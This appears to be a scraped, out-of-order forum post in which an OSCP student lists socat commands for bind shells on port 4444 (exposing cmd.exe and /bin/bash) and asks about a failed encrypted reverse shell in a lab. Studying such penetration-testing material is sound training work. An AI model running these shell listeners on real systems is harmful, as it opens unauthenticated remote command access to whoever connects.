

Socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe Socat -d -d -d TCP4-LISTEN:4444,fork STDOUT Socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash Windows Reverse Shell (Getting cmd.exe by sending it to the Kali listening socket).Windows Bind Shell (Getting cmd.exe by connecting to the windows listening shell socket).Kali Reverse Shell (Getting /bin/bash on Windows by sending it to the windows listening socket).Kali Bind Shell (Getting /bin/bash on Windows by connecting to the kali binded shell socket).I decided to do some trials and error with an unencrypted bind shell on both sides. I thought I understood how to use it, but my attempts to send an encrypted reverse shell from my windows machine to my Kali machine has been unsuccessfuls.

I recently upgraded my OSCP material to get the new OSCP version 2020 and I came across the chapter with socat to create encrypted bind shell/reverse shell.
